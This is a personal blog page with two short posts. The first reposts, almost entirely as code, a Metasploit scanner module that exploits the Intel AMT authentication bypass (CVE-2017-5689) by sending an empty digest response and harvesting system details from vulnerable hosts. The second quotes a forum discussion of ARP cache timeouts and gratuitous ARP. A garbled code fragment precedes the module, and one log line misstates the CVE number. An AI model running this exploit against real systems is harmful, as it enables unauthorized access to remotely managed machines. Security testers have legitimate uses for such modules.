Thursday, May 10, 2018

...back to war!...we are talking about big "system" infra estrutures and builded plug ins in drones

).map{|x| x.first.to_s.gsub("/", "/") }).map{|x| x.first.to_s.gsub("/", "/") }
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Scanner
def initialize
super(
'Name' => 'Intel AMT Digest Authentication Bypass Scanner',
'Description' => %q{
This module scans for Intel Active Management Technology endpoints and attempts
to bypass authentication using a blank HTTP digest (CVE-2017-5689). This service
can be found on ports 16992, 16993 (tls), 623, and 624 (tls).
},
'Author' => 'hdm',
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2017-5689' ],
[ 'URL', 'https://www.embedi.com/news/what-you-need-know-about-intel-amt-vulnerability' ],
[ 'URL', 'https://security-center.intel.com/advisory.aspx?intelid=INTEL-SA-00075&languageid=en-fr' ],
],
'DisclosureDate' => 'May 05 2017'
)
register_options(
[
Opt::RPORT(16992),
])
end
# Fingerprint a single host
def run_host(ip)
begin
connect
res = send_request_raw({ 'uri' => '/hw-sys.htm', 'method' => 'GET' })
unless res && res.headers['Server'].to_s.index('Intel(R) Active Management Technology')
disconnect
return
end
vprint_status("#{ip}:#{rport} - Found an Intel AMT endpoint: #{res.headers['Server']}")
unless res.headers['WWW-Authenticate'] =~ /realm="([^"]+)".*nonce="([^"]+)"/
vprint_status("#{ip}:#{rport} - AMT service did not send a valid digest response")
disconnect
return
end
realm = $1
nonce = $2
cnonce = Rex::Text.rand_text(10)
res = send_request_raw(
{
'uri' => '/hw-sys.htm',
'method' => 'GET',
'headers' => {
'Authorization' =>
"Digest username=\"admin\", realm=\"#{realm}\", nonce=\"#{nonce}\", uri=\"/hw-sys.htm\", " +
"cnonce=\"#{cnonce}\", nc=1, qop=\"auth\", response=\"\""
}
})
unless res && res.body.to_s.index("Computer model")
vprint_error("#{ip}:#{rport} - AMT service does not appear to be vulnerable")
return
end
proof = res.body.to_s
proof_hash = nil
info_keys = res.body.scan(/([^\<]+)(?:<\/p>)?/
if info_keys.length > 0
proof_hash = {}
proof = ""
info_vals = res.body.scan(/([^\<]+)</
info_keys.each do |ik|
iv = info_vals.shift
break unless iv
proof_hash[ik] = iv
proof << "#{iv}: #{ik}\n"
end
end
print_good("#{ip}:#{rport} - Vulnerable to CVE-2017-5869 #{proof_hash.inspect}")
report_note(
:host => ip,
:proto => 'tcp',
:port => rport,
:type => 'intel.amt.system_information',
:data => proof_hash
)
report_vuln({
:host => rhost,
:port => rport,
:proto => 'tcp',
:name => "Intel AMT Digest Authentication Bypass",
:refs => self.references,
:info => proof
})
rescue ::Timeout::Error, ::Errno::EPIPE
ensure
disconnect
end
end
end
CVE-2017-5689 Intel AMT Digest Authentication Bypass Scanner | Rapid7
Back to search Intel AMT Digest Authentication Bypass Scanner This module scans for Intel Active…
RAPID7.COM

at No comments:
welcome back to war! deadline is over! ...back to computing, machines and "disrupt" the "system" ! (after this I'm going hunting the code, ok) Let's read a very good explanation about "timeouts" on ARP packets " keep the other guys' ARP caches from timing out by proactively broadcasting your own ARP announcements. Most Ethernet layers will accept gratuitous ARP responses into their caches without trying to correlate them to ARP requests they have previously sent."
ARP Timeouts. Why fixed periodic?
This one's been bugging me for years. Basic question: Is there some reason ARP has to be implemented with fixed timeouts on ARP cache entries? I do a lot of work in Real Time ciricles. We do most...
at No comments:
Subscribe to: Posts (Atom)

Naval Tactics ( Echo Era Corp)